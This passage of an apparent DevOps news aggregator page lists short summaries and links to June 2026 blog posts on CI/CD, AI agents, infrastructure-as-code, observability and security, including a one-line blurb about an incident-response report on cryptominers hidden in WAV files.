        </a>
        <button 
          class="copy-heading-link absolute -left-8 top-1/2 -translate-y-1/2 opacity-0 group-hover:opacity-100 transition-all duration-200 p-1.5 rounded-md hover:bg-muted/80 focus:outline-none focus:ring-2 focus:ring-ring focus:ring-offset-2 text-muted-foreground hover:text-foreground"
          aria-label="Copy link to section"
          data-heading-id="h3-harness-mcp-server-now-connects-google-antigravity-ide"
        >
          <svg class="h-4 w-4" fill="none" stroke="currentColor" viewBox="0 0 24 24">
            <path stroke-linecap="round" stroke-linejoin="round" stroke-width="2" 
              d="M13.828 10.172a4 4 0 00-5.656 0l-4 4a4 4 0 105.656 5.656l1.102-1.101m-.758-4.899a4 4 0 005.656 0l4-4a4 4 0 00-5.656-5.656l-1.1 1.1" />
            </svg>
          </button>
        </h3><p>Connect Harness MCP Server inside Google Antigravity to let AI agents inspect pipelines, debug deployments, trigger approved runs, and act on real-time delivery context with RBAC, audit logs, and huma</p>
<p><strong>📅 Jun 22, 2026</strong> • <strong>📰 Harness Blog</strong></p>
<p><a href="https://www.harness.io/blog/harness-delivery-intelligence-now-inside-antigravity"><strong>🔗 Read more</strong></a></p>
<h3 id="h3-feature-flags-were-always-important-sre-agents-make-them-essential" class="group relative scroll-mt-24">
        <a href="#h3-feature-flags-were-always-important-sre-agents-make-them-essential" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          📄 Feature Flags Were Always Important. SRE Agents Make Them Essential.
        </a>
        <button 
          class="copy-heading-link absolute -left-8 top-1/2 -translate-y-1/2 opacity-0 group-hover:opacity-100 transition-all duration-200 p-1.5 rounded-md hover:bg-muted/80 focus:outline-none focus:ring-2 focus:ring-ring focus:ring-offset-2 text-muted-foreground hover:text-foreground"
          aria-label="Copy link to section"
          data-heading-id="h3-feature-flags-were-always-important-sre-agents-make-them-essential"
        >
          <svg class="h-4 w-4" fill="none" stroke="currentColor" viewBox="0 0 24 24">
            <path stroke-linecap="round" stroke-linejoin="round" stroke-width="2" 
              d="M13.828 10.172a4 4 0 00-5.656 0l-4 4a4 4 0 105.656 5.656l1.102-1.101m-.758-4.899a4 4 0 005.656 0l4-4a4 4 0 00-5.656-5.656l-1.1 1.1" />
            </svg>
          </button>
        </h3><p>AI-powered SRE agents are getting very good at identifying when something is wrong in production. What they haven&#39;t solved, however, and what most teams have dramatically underinvested in, is what hap</p>
<p><strong>📅 Jun 19, 2026</strong> • <strong>📰 LaunchDarkly Blog</strong></p>
<p><a href="https://launchdarkly.com/blog/feature-flags-aws-devops-agent/"><strong>🔗 Read more</strong></a></p>
<h3 id="h3-how-we-built-an-internal-data-analytics-agent" class="group relative scroll-mt-24">
        <a href="#h3-how-we-built-an-internal-data-analytics-agent" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          📄 How we built an internal data analytics agent
        </a>
        <button 
          class="copy-heading-link absolute -left-8 top-1/2 -translate-y-1/2 opacity-0 group-hover:opacity-100 transition-all duration-200 p-1.5 rounded-md hover:bg-muted/80 focus:outline-none focus:ring-2 focus:ring-ring focus:ring-offset-2 text-muted-foreground hover:text-foreground"
          aria-label="Copy link to section"
          data-heading-id="h3-how-we-built-an-internal-data-analytics-agent"
        >
          <svg class="h-4 w-4" fill="none" stroke="currentColor" viewBox="0 0 24 24">
            <path stroke-linecap="round" stroke-linejoin="round" stroke-width="2" 
              d="M13.828 10.172a4 4 0 00-5.656 0l-4 4a4 4 0 105.656 5.656l1.102-1.101m-.758-4.899a4 4 0 005.656 0l4-4a4 4 0 00-5.656-5.656l-1.1 1.1" />
            </svg>
          </button>
        </h3><p>Qubot, our internal Copilot-powered analytics agent, allows any GitHub employee to ask questions about our data in plain language. Here&#39;s what we learned as we built it. The post How we built an inter</p>
<p><strong>📅 Jun 19, 2026</strong> • <strong>📰 GitHub Blog</strong></p>
<p><a href="https://github.blog/ai-and-ml/github-copilot/how-we-built-an-internal-data-analytics-agent/"><strong>🔗 Read more</strong></a></p>
<h3 id="h3-bamboo-end-of-life-how-to-prepare-and-choose-the-right-cicd-replacement" class="group relative scroll-mt-24">
        <a href="#h3-bamboo-end-of-life-how-to-prepare-and-choose-the-right-cicd-replacement" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          📄 Bamboo End of Life: How to Prepare and Choose the Right CI/CD Replacement
        </a>
        <button 
          class="copy-heading-link absolute -left-8 top-1/2 -translate-y-1/2 opacity-0 group-hover:opacity-100 transition-all duration-200 p-1.5 rounded-md hover:bg-muted/80 focus:outline-none focus:ring-2 focus:ring-ring focus:ring-offset-2 text-muted-foreground hover:text-foreground"
          aria-label="Copy link to section"
          data-heading-id="h3-bamboo-end-of-life-how-to-prepare-and-choose-the-right-cicd-replacement"
        >
          <svg class="h-4 w-4" fill="none" stroke="currentColor" viewBox="0 0 24 24">
            <path stroke-linecap="round" stroke-linejoin="round" stroke-width="2" 
              d="M13.828 10.172a4 4 0 00-5.656 0l-4 4a4 4 0 105.656 5.656l1.102-1.101m-.758-4.899a4 4 0 005.656 0l4-4a4 4 0 00-5.656-5.656l-1.1 1.1" />
            </svg>
          </button>
        </h3><p>If your team is using Bamboo, you’ve probably seen the news: Bamboo Data Center is being retired as part of Atlassian’s broader Data Center transition strategy. Support will continue for several years</p>
<p><strong>📅 Jun 19, 2026</strong> • <strong>📰 JetBrains Blog</strong></p>
<p><a href="https://blog.jetbrains.com/teamcity/2026/06/bamboo-end-of-life/"><strong>🔗 Read more</strong></a></p>
<h3 id="h3-how-pull-request-limits-are-cutting-down-the-noise" class="group relative scroll-mt-24">
        <a href="#h3-how-pull-request-limits-are-cutting-down-the-noise" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          📄 How pull request limits are cutting down the noise
        </a>
        <button 
          class="copy-heading-link absolute -left-8 top-1/2 -translate-y-1/2 opacity-0 group-hover:opacity-100 transition-all duration-200 p-1.5 rounded-md hover:bg-muted/80 focus:outline-none focus:ring-2 focus:ring-ring focus:ring-offset-2 text-muted-foreground hover:text-foreground"
          aria-label="Copy link to section"
          data-heading-id="h3-how-pull-request-limits-are-cutting-down-the-noise"
        >
          <svg class="h-4 w-4" fill="none" stroke="currentColor" viewBox="0 0 24 24">
            <path stroke-linecap="round" stroke-linejoin="round" stroke-width="2" 
              d="M13.828 10.172a4 4 0 00-5.656 0l-4 4a4 4 0 105.656 5.656l1.102-1.101m-.758-4.899a4 4 0 005.656 0l4-4a4 4 0 00-5.656-5.656l-1.1 1.1" />
            </svg>
          </button>
        </h3><p>Learn how pull request limits can help manage contribution volume in your repositories, and see what’s next on the roadmap. The post How pull request limits are cutting down the noise appeared first o</p>
<p><strong>📅 Jun 18, 2026</strong> • <strong>📰 GitHub Blog</strong></p>
<p><a href="https://github.blog/open-source/maintainers/how-pull-request-limits-are-cutting-down-the-noise/"><strong>🔗 Read more</strong></a></p>
<h3 id="h3-one-vulnerability-view-from-scanner-coverage-to-ai-governance" class="group relative scroll-mt-24">
        <a href="#h3-one-vulnerability-view-from-scanner-coverage-to-ai-governance" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          📄 One vulnerability view: From scanner coverage to AI governance
        </a>
        <button 
          class="copy-heading-link absolute -left-8 top-1/2 -translate-y-1/2 opacity-0 group-hover:opacity-100 transition-all duration-200 p-1.5 rounded-md hover:bg-muted/80 focus:outline-none focus:ring-2 focus:ring-ring focus:ring-offset-2 text-muted-foreground hover:text-foreground"
          aria-label="Copy link to section"
          data-heading-id="h3-one-vulnerability-view-from-scanner-coverage-to-ai-governance"
        >
          <svg class="h-4 w-4" fill="none" stroke="currentColor" viewBox="0 0 24 24">
            <path stroke-linecap="round" stroke-linejoin="round" stroke-width="2" 
              d="M13.828 10.172a4 4 0 00-5.656 0l-4 4a4 4 0 105.656 5.656l1.102-1.101m-.758-4.899a4 4 0 005.656 0l4-4a4 4 0 00-5.656-5.656l-1.1 1.1" />
            </svg>
          </button>
        </h3><p>Most enterprises use a handful of different security scanners, each configured and enforced, project by project. With no single view of what scanners run where, policies drift, blind spots go undetect</p>
<p><strong>📅 Jun 18, 2026</strong> • <strong>📰 GitLab Blog</strong></p>
<p><a href="https://about.gitlab.com/blog/one-vulnerability-view/"><strong>🔗 Read more</strong></a></p>
<h3 id="h3-gitlab-191-released" class="group relative scroll-mt-24">
        <a href="#h3-gitlab-191-released" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          📄 GitLab 19.1 released
        </a>
        <button 
          class="copy-heading-link absolute -left-8 top-1/2 -translate-y-1/2 opacity-0 group-hover:opacity-100 transition-all duration-200 p-1.5 rounded-md hover:bg-muted/80 focus:outline-none focus:ring-2 focus:ring-ring focus:ring-offset-2 text-muted-foreground hover:text-foreground"
          aria-label="Copy link to section"
          data-heading-id="h3-gitlab-191-released"
        >
          <svg class="h-4 w-4" fill="none" stroke="currentColor" viewBox="0 0 24 24">
            <path stroke-linecap="round" stroke-linejoin="round" stroke-width="2" 
              d="M13.828 10.172a4 4 0 00-5.656 0l-4 4a4 4 0 105.656 5.656l1.102-1.101m-.758-4.899a4 4 0 005.656 0l4-4a4 4 0 00-5.656-5.656l-1.1 1.1" />
            </svg>
          </button>
        </h3><p><strong>📅 Jun 18, 2026</strong> • <strong>📰 GitLab Blog</strong></p>
<p><a href="https://docs.gitlab.com/releases/19/gitlab-19-1-released/"><strong>🔗 Read more</strong></a></p>
<h3 id="h3-ai-catalog-updates-for-governance-and-operations" class="group relative scroll-mt-24">
        <a href="#h3-ai-catalog-updates-for-governance-and-operations" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          📄 AI Catalog updates for governance and operations
        </a>
        <button 
          class="copy-heading-link absolute -left-8 top-1/2 -translate-y-1/2 opacity-0 group-hover:opacity-100 transition-all duration-200 p-1.5 rounded-md hover:bg-muted/80 focus:outline-none focus:ring-2 focus:ring-ring focus:ring-offset-2 text-muted-foreground hover:text-foreground"
          aria-label="Copy link to section"
          data-heading-id="h3-ai-catalog-updates-for-governance-and-operations"
        >
          <svg class="h-4 w-4" fill="none" stroke="currentColor" viewBox="0 0 24 24">
            <path stroke-linecap="round" stroke-linejoin="round" stroke-width="2" 
              d="M13.828 10.172a4 4 0 00-5.656 0l-4 4a4 4 0 105.656 5.656l1.102-1.101m-.758-4.899a4 4 0 005.656 0l4-4a4 4 0 00-5.656-5.656l-1.1 1.1" />
            </svg>
          </button>
        </h3><p>Enterprise AI adoption often stalls not because the technology isn&#39;t ready, but because admins can&#39;t answer the question their security team is asking: What&#39;s actually running in our environment, and </p>
<p><strong>📅 Jun 18, 2026</strong> • <strong>📰 GitLab Blog</strong></p>
<p><a href="https://about.gitlab.com/blog/ai-catalog-updates-for-governance-and-operations/"><strong>🔗 Read more</strong></a></p>
<h3 id="h3-getting-more-from-each-token-how-copilot-improves-context-handling-and-model-routing" class="group relative scroll-mt-24">
        <a href="#h3-getting-more-from-each-token-how-copilot-improves-context-handling-and-model-routing" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          📄 Getting more from each token: How Copilot improves context handling and model routing
        </a>
        <button 
          class="copy-heading-link absolute -left-8 top-1/2 -translate-y-1/2 opacity-0 group-hover:opacity-100 transition-all duration-200 p-1.5 rounded-md hover:bg-muted/80 focus:outline-none focus:ring-2 focus:ring-ring focus:ring-offset-2 text-muted-foreground hover:text-foreground"
          aria-label="Copy link to section"
          data-heading-id="h3-getting-more-from-each-token-how-copilot-improves-context-handling-and-model-routing"
        >
          <svg class="h-4 w-4" fill="none" stroke="currentColor" viewBox="0 0 24 24">
            <path stroke-linecap="round" stroke-linejoin="round" stroke-width="2" 
              d="M13.828 10.172a4 4 0 00-5.656 0l-4 4a4 4 0 105.656 5.656l1.102-1.101m-.758-4.899a4 4 0 005.656 0l4-4a4 4 0 00-5.656-5.656l-1.1 1.1" />
            </svg>
          </button>
        </h3><p>How GitHub Copilot is making more of each session go toward useful work, so your credits go further. The post Getting more from each token: How Copilot improves context handling and model routing appe</p>
<p><strong>📅 Jun 17, 2026</strong> • <strong>📰 GitHub Blog</strong></p>
<p><a href="https://github.blog/ai-and-ml/github-copilot/getting-more-from-each-token-how-copilot-improves-context-handling-and-model-routing/"><strong>🔗 Read more</strong></a></p>
<h3 id="h3-gitlab-named-a-leader-in-the-2026-gartner-magic-quadrant-for-devsecops-platforms" class="group relative scroll-mt-24">
        <a href="#h3-gitlab-named-a-leader-in-the-2026-gartner-magic-quadrant-for-devsecops-platforms" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          📄 GitLab named a Leader in the 2026 Gartner® Magic Quadrant™ for DevSecOps Platforms
        </a>
        <button 
          class="copy-heading-link absolute -left-8 top-1/2 -translate-y-1/2 opacity-0 group-hover:opacity-100 transition-all duration-200 p-1.5 rounded-md hover:bg-muted/80 focus:outline-none focus:ring-2 focus:ring-ring focus:ring-offset-2 text-muted-foreground hover:text-foreground"
          aria-label="Copy link to section"
          data-heading-id="h3-gitlab-named-a-leader-in-the-2026-gartner-magic-quadrant-for-devsecops-platforms"
        >
          <svg class="h-4 w-4" fill="none" stroke="currentColor" viewBox="0 0 24 24">
            <path stroke-linecap="round" stroke-linejoin="round" stroke-width="2" 
              d="M13.828 10.172a4 4 0 00-5.656 0l-4 4a4 4 0 105.656 5.656l1.102-1.101m-.758-4.899a4 4 0 005.656 0l4-4a4 4 0 00-5.656-5.656l-1.1 1.1" />
            </svg>
          </button>
        </h3><p>For the fourth year running, Gartner has named GitLab a Leader in the 2026 Gartner® Magic Quadrant™ for DevSecOps Platforms. We believe this recognition reflects what our customers already see: The wo</p>
<p><strong>📅 Jun 17, 2026</strong> • <strong>📰 GitLab Blog</strong></p>
<p><a href="https://about.gitlab.com/blog/gitlab-leader-2026-gartner-mq-devsecops-platforms/"><strong>🔗 Read more</strong></a></p>
<h3 id="h3-harness-named-a-leader-in-the-2026-gartner-magic-quadrant" class="group relative scroll-mt-24">
        <a href="#h3-harness-named-a-leader-in-the-2026-gartner-magic-quadrant" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          📄 Harness Named a Leader in the 2026 Gartner® Magic Quadrant™
        </a>
        <button 
          class="copy-heading-link absolute -left-8 top-1/2 -translate-y-1/2 opacity-0 group-hover:opacity-100 transition-all duration-200 p-1.5 rounded-md hover:bg-muted/80 focus:outline-none focus:ring-2 focus:ring-ring focus:ring-offset-2 text-muted-foreground hover:text-foreground"
          aria-label="Copy link to section"
          data-heading-id="h3-harness-named-a-leader-in-the-2026-gartner-magic-quadrant"
        >
          <svg class="h-4 w-4" fill="none" stroke="currentColor" viewBox="0 0 24 24">
            <path stroke-linecap="round" stroke-linejoin="round" stroke-width="2" 
              d="M13.828 10.172a4 4 0 00-5.656 0l-4 4a4 4 0 105.656 5.656l1.102-1.101m-.758-4.899a4 4 0 005.656 0l4-4a4 4 0 00-5.656-5.656l-1.1 1.1" />
            </svg>
          </button>
        </h3><p>Harness has been named a Leader in the 2026 Gartner® Magic Quadrant™ for DevSecOps Platforms for the third consecutive year and positioned furthest in Completeness of Vision. | Blog</p>
<p><strong>📅 Jun 17, 2026</strong> • <strong>📰 Harness Blog</strong></p>
<p><a href="https://www.harness.io/blog/harness-leader-2026-gartner-magic-quadrant-devsecops-platforms"><strong>🔗 Read more</strong></a></p>
<hr>
<h2 id="h2-iac" class="group relative scroll-mt-24">
        <a href="#h2-iac" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          🏗️ IaC
        </a>
        <button 
          class="copy-heading-link absolute -left-8 top-1/2 -translate-y-1/2 opacity-0 group-hover:opacity-100 transition-all duration-200 p-1.5 rounded-md hover:bg-muted/80 focus:outline-none focus:ring-2 focus:ring-ring focus:ring-offset-2 text-muted-foreground hover:text-foreground"
          aria-label="Copy link to section"
          data-heading-id="h2-iac"
        >
          <svg class="h-4 w-4" fill="none" stroke="currentColor" viewBox="0 0 24 24">
            <path stroke-linecap="round" stroke-linejoin="round" stroke-width="2" 
              d="M13.828 10.172a4 4 0 00-5.656 0l-4 4a4 4 0 105.656 5.656l1.102-1.101m-.758-4.899a4 4 0 005.656 0l4-4a4 4 0 00-5.656-5.656l-1.1 1.1" />
            </svg>
          </button>
        </h2><h3 id="h3-amazon-msk-express-brokers-now-support-intelligent-rebalancing-on-existing-clusters" class="group relative scroll-mt-24">
        <a href="#h3-amazon-msk-express-brokers-now-support-intelligent-rebalancing-on-existing-clusters" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          📄 Amazon MSK Express brokers now support Intelligent Rebalancing on existing clusters
        </a>
        <button 
          class="copy-heading-link absolute -left-8 top-1/2 -translate-y-1/2 opacity-0 group-hover:opacity-100 transition-all duration-200 p-1.5 rounded-md hover:bg-muted/80 focus:outline-none focus:ring-2 focus:ring-ring focus:ring-offset-2 text-muted-foreground hover:text-foreground"
          aria-label="Copy link to section"
          data-heading-id="h3-amazon-msk-express-brokers-now-support-intelligent-rebalancing-on-existing-clusters"
        >
          <svg class="h-4 w-4" fill="none" stroke="currentColor" viewBox="0 0 24 24">
            <path stroke-linecap="round" stroke-linejoin="round" stroke-width="2" 
              d="M13.828 10.172a4 4 0 00-5.656 0l-4 4a4 4 0 105.656 5.656l1.102-1.101m-.758-4.899a4 4 0 005.656 0l4-4a4 4 0 00-5.656-5.656l-1.1 1.1" />
            </svg>
          </button>
        </h3><p>Amazon MSK Provisioned clusters with Express brokers now support Intelligent Rebalancing on all existing clusters, at no additional cost. Previously available only on newly created clusters, Intellige</p>
<p><strong>📅 Jun 18, 2026</strong> • <strong>📰 CloudFormation Updates</strong></p>
<p><a href="https://aws.amazon.com/about-aws/whats-new/2026/06/amazon-msk-express-intelligent/"><strong>🔗 Read more</strong></a></p>
<h3 id="h3-automate-scylladb-x-cloud-clusters-with-terraform" class="group relative scroll-mt-24">
        <a href="#h3-automate-scylladb-x-cloud-clusters-with-terraform" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          📄 Automate ScyllaDB X Cloud Clusters with Terraform
        </a>
        <button 
          class="copy-heading-link absolute -left-8 top-1/2 -translate-y-1/2 opacity-0 group-hover:opacity-100 transition-all duration-200 p-1.5 rounded-md hover:bg-muted/80 focus:outline-none focus:ring-2 focus:ring-ring focus:ring-offset-2 text-muted-foreground hover:text-foreground"
          aria-label="Copy link to section"
          data-heading-id="h3-automate-scylladb-x-cloud-clusters-with-terraform"
        >
          <svg class="h-4 w-4" fill="none" stroke="currentColor" viewBox="0 0 24 24">
            <path stroke-linecap="round" stroke-linejoin="round" stroke-width="2" 
              d="M13.828 10.172a4 4 0 00-5.656 0l-4 4a4 4 0 105.656 5.656l1.102-1.101m-.758-4.899a4 4 0 005.656 0l4-4a4 4 0 00-5.656-5.656l-1.1 1.1" />
            </svg>
          </button>
        </h3><p>The ScyllaDB Cloud Terraform provider gives you infrastructure-as-code control over your clusters.</p>
<p><strong>📅 Jun 16, 2026</strong> • <strong>📰 ScyllaDB Blog</strong></p>
<p><a href="https://www.scylladb.com/2026/06/16/automate-scylladb-x-cloud-clusters-with-terraform/"><strong>🔗 Read more</strong></a></p>
<hr>
<h2 id="h2-observability" class="group relative scroll-mt-24">
        <a href="#h2-observability" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          📊 Observability
        </a>
        <button 
          class="copy-heading-link absolute -left-8 top-1/2 -translate-y-1/2 opacity-0 group-hover:opacity-100 transition-all duration-200 p-1.5 rounded-md hover:bg-muted/80 focus:outline-none focus:ring-2 focus:ring-ring focus:ring-offset-2 text-muted-foreground hover:text-foreground"
          aria-label="Copy link to section"
          data-heading-id="h2-observability"
        >
          <svg class="h-4 w-4" fill="none" stroke="currentColor" viewBox="0 0 24 24">
            <path stroke-linecap="round" stroke-linejoin="round" stroke-width="2" 
              d="M13.828 10.172a4 4 0 00-5.656 0l-4 4a4 4 0 105.656 5.656l1.102-1.101m-.758-4.899a4 4 0 005.656 0l4-4a4 4 0 00-5.656-5.656l-1.1 1.1" />
            </svg>
          </button>
        </h2><h3 id="h3-telemetry-that-matters-designing-sustainable-high-impact-observability-pipelines" class="group relative scroll-mt-24">
        <a href="#h3-telemetry-that-matters-designing-sustainable-high-impact-observability-pipelines" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          📄 Telemetry that matters: Designing sustainable, high-impact observability pipelines
        </a>
        <button 
          class="copy-heading-link absolute -left-8 top-1/2 -translate-y-1/2 opacity-0 group-hover:opacity-100 transition-all duration-200 p-1.5 rounded-md hover:bg-muted/80 focus:outline-none focus:ring-2 focus:ring-ring focus:ring-offset-2 text-muted-foreground hover:text-foreground"
          aria-label="Copy link to section"
          data-heading-id="h3-telemetry-that-matters-designing-sustainable-high-impact-observability-pipelines"
        >
          <svg class="h-4 w-4" fill="none" stroke="currentColor" viewBox="0 0 24 24">
            <path stroke-linecap="round" stroke-linejoin="round" stroke-width="2" 
              d="M13.828 10.172a4 4 0 00-5.656 0l-4 4a4 4 0 105.656 5.656l1.102-1.101m-.758-4.899a4 4 0 005.656 0l4-4a4 4 0 00-5.656-5.656l-1.1 1.1" />
            </svg>
          </button>
        </h3><p>As system architectures grow increasingly complex, the cloud-native community faces a subtle but pressing challenge: we are drowning in our own telemetry data. It is easier than ever to instrument an </p>
<p><strong>📅 Jun 22, 2026</strong> • <strong>📰 CNCF Blog</strong></p>
<p><a href="https://www.cncf.io/blog/2026/06/22/telemetry-that-matters-designing-sustainable-high-impact-observability-pipelines/"><strong>🔗 Read more</strong></a></p>
<h3 id="h3-production-ready-autonomous-incident-resolution-with-aws-devops-agent-now-ga-and-datadog-mcp-server" class="group relative scroll-mt-24">
        <a href="#h3-production-ready-autonomous-incident-resolution-with-aws-devops-agent-now-ga-and-datadog-mcp-server" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          📄 Production-Ready Autonomous Incident Resolution with AWS DevOps Agent (now GA) and Datadog MCP Server
        </a>
        <button 
          class="copy-heading-link absolute -left-8 top-1/2 -translate-y-1/2 opacity-0 group-hover:opacity-100 transition-all duration-200 p-1.5 rounded-md hover:bg-muted/80 focus:outline-none focus:ring-2 focus:ring-ring focus:ring-offset-2 text-muted-foreground hover:text-foreground"
          aria-label="Copy link to section"
          data-heading-id="h3-production-ready-autonomous-incident-resolution-with-aws-devops-agent-now-ga-and-datadog-mcp-server"
        >
          <svg class="h-4 w-4" fill="none" stroke="currentColor" viewBox="0 0 24 24">
            <path stroke-linecap="round" stroke-linejoin="round" stroke-width="2" 
              d="M13.828 10.172a4 4 0 00-5.656 0l-4 4a4 4 0 105.656 5.656l1.102-1.101m-.758-4.899a4 4 0 005.656 0l4-4a4 4 0 00-5.656-5.656l-1.1 1.1" />
            </svg>
          </button>
        </h3><p>This post was co-written with Bharadwaj Tanikella (AI/ML Product Engineering Leader) and Mohammad Jama (Product Marketing Manager) from Datadog. In December 2025, we showed how AWS DevOps Agent and Da</p>
<p><strong>📅 Jun 18, 2026</strong> • <strong>📰 AWS DevOps Blog</strong></p>
<p><a href="https://aws.amazon.com/blogs/devops/production-ready-autonomous-incident-resolution-with-aws-devops-agent-now-ga-and-datadog-mcp-server/"><strong>🔗 Read more</strong></a></p>
<h3 id="h3-amazon-cloudwatch-synthetics-now-supports-multilocation-canaries" class="group relative scroll-mt-24">
        <a href="#h3-amazon-cloudwatch-synthetics-now-supports-multilocation-canaries" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          📄 Amazon CloudWatch Synthetics now supports multilocation canaries
        </a>
        <button 
          class="copy-heading-link absolute -left-8 top-1/2 -translate-y-1/2 opacity-0 group-hover:opacity-100 transition-all duration-200 p-1.5 rounded-md hover:bg-muted/80 focus:outline-none focus:ring-2 focus:ring-ring focus:ring-offset-2 text-muted-foreground hover:text-foreground"
          aria-label="Copy link to section"
          data-heading-id="h3-amazon-cloudwatch-synthetics-now-supports-multilocation-canaries"
        >
          <svg class="h-4 w-4" fill="none" stroke="currentColor" viewBox="0 0 24 24">
            <path stroke-linecap="round" stroke-linejoin="round" stroke-width="2" 
              d="M13.828 10.172a4 4 0 00-5.656 0l-4 4a4 4 0 105.656 5.656l1.102-1.101m-.758-4.899a4 4 0 005.656 0l4-4a4 4 0 00-5.656-5.656l-1.1 1.1" />
            </svg>
          </button>
        </h3><p>Today, Amazon CloudWatch Synthetics announces support for multilocation canaries, allowing developers and site reliability engineers to run the same canary across multiple AWS Regions simultaneously f</p>
<p><strong>📅 Jun 18, 2026</strong> • <strong>📰 CloudFormation Updates</strong></p>
<p><a href="https://aws.amazon.com/about-aws/whats-new/2026/06/amazon-cloudwatch-synthetics-multilocation/"><strong>🔗 Read more</strong></a></p>
<h3 id="h3-why-launchdarkly-is-standardizing-on-new-relic" class="group relative scroll-mt-24">
        <a href="#h3-why-launchdarkly-is-standardizing-on-new-relic" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          📄 Why LaunchDarkly is Standardizing on New Relic
        </a>
        <button 
          class="copy-heading-link absolute -left-8 top-1/2 -translate-y-1/2 opacity-0 group-hover:opacity-100 transition-all duration-200 p-1.5 rounded-md hover:bg-muted/80 focus:outline-none focus:ring-2 focus:ring-ring focus:ring-offset-2 text-muted-foreground hover:text-foreground"
          aria-label="Copy link to section"
          data-heading-id="h3-why-launchdarkly-is-standardizing-on-new-relic"
        >
          <svg class="h-4 w-4" fill="none" stroke="currentColor" viewBox="0 0 24 24">
            <path stroke-linecap="round" stroke-linejoin="round" stroke-width="2" 
              d="M13.828 10.172a4 4 0 00-5.656 0l-4 4a4 4 0 105.656 5.656l1.102-1.101m-.758-4.899a4 4 0 005.656 0l4-4a4 4 0 00-5.656-5.656l-1.1 1.1" />
            </svg>
          </button>
        </h3><p>Today, we are announcing that LaunchDarkly is officially moving its primary observability and telemetry workloads to New Relic.</p>
<p><strong>📅 Jun 16, 2026</strong> • <strong>📰 LaunchDarkly Blog</strong></p>
<p><a href="https://launchdarkly.com/blog/why-launchdarkly-is-standardizing-on-new-relic/"><strong>🔗 Read more</strong></a></p>
<hr>
<h2 id="h2-security" class="group relative scroll-mt-24">
        <a href="#h2-security" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          🔐 Security
        </a>
        <button 
          class="copy-heading-link absolute -left-8 top-1/2 -translate-y-1/2 opacity-0 group-hover:opacity-100 transition-all duration-200 p-1.5 rounded-md hover:bg-muted/80 focus:outline-none focus:ring-2 focus:ring-ring focus:ring-offset-2 text-muted-foreground hover:text-foreground"
          aria-label="Copy link to section"
          data-heading-id="h2-security"
        >
          <svg class="h-4 w-4" fill="none" stroke="currentColor" viewBox="0 0 24 24">
            <path stroke-linecap="round" stroke-linejoin="round" stroke-width="2" 
              d="M13.828 10.172a4 4 0 00-5.656 0l-4 4a4 4 0 105.656 5.656l1.102-1.101m-.758-4.899a4 4 0 005.656 0l4-4a4 4 0 00-5.656-5.656l-1.1 1.1" />
            </svg>
          </button>
        </h2><h3 id="h3-threats-making-wavs-incident-response-to-a-cryptomining-attack" class="group relative scroll-mt-24">
        <a href="#h3-threats-making-wavs-incident-response-to-a-cryptomining-attack" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          📄 Threats Making WAVs - Incident Response to a Cryptomining Attack
        </a>
        <button 
          class="copy-heading-link absolute -left-8 top-1/2 -translate-y-1/2 opacity-0 group-hover:opacity-100 transition-all duration-200 p-1.5 rounded-md hover:bg-muted/80 focus:outline-none focus:ring-2 focus:ring-ring focus:ring-offset-2 text-muted-foreground hover:text-foreground"
          aria-label="Copy link to section"
          data-heading-id="h3-threats-making-wavs-incident-response-to-a-cryptomining-attack"
        >
          <svg class="h-4 w-4" fill="none" stroke="currentColor" viewBox="0 0 24 24">
            <path stroke-linecap="round" stroke-linejoin="round" stroke-width="2" 
              d="M13.828 10.172a4 4 0 00-5.656 0l-4 4a4 4 0 105.656 5.656l1.102-1.101m-.758-4.899a4 4 0 005.656 0l4-4a4 4 0 00-5.656-5.656l-1.1 1.1" />
            </svg>
          </button>
        </h3><p>Guardicore security researchers describe and uncover a full analysis of a cryptomining attack, which hid a cryptominer inside WAV files. The report includes the full attack vectors, from detection, in</p>
<p><strong>📅 Jun 22, 2026</strong> • <strong>📰 Linode Blog</strong></p>
<p><a href="https://www.akamai.com/blog/security/threats-making-wavs-incident-reponse-cryptomining-attack"><strong>🔗 Read more</strong></a></p>
<h3 id="h3-modernize-with-confidence-how-red-hat-consulting-de-risks-your-linux-transition" class="group relative scroll-mt-24">
        <a href="#h3-modernize-with-confidence-how-red-hat-consulting-de-risks-your-linux-transition" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          📄 Modernize with confidence: How Red Hat Consulting de-risks your Linux transition
        </a>
        <button 
          class="copy-heading-link absolute -left-8 top-1/2 -translate-y-1/2 opacity-0 group-hover:opacity-100 transition-all duration-200 p-1.5 rounded-md hover:bg-muted/80 focus:outline-none focus:ring-2 focus:ring-ring focus:ring-offset-2 text-muted-foreground hover:text-foreground"
          aria-label="Copy link to section"
          data-heading-id="h3-modernize-with-confidence-how-red-hat-consulting-de-risks-your-linux-transition"
        >
          <svg class="h-4 w-4" fill="none" stroke="currentColor" viewBox="0 0 24 24">
            <path stroke-linecap="round" stroke-linejoin="round" stroke-width="2" 
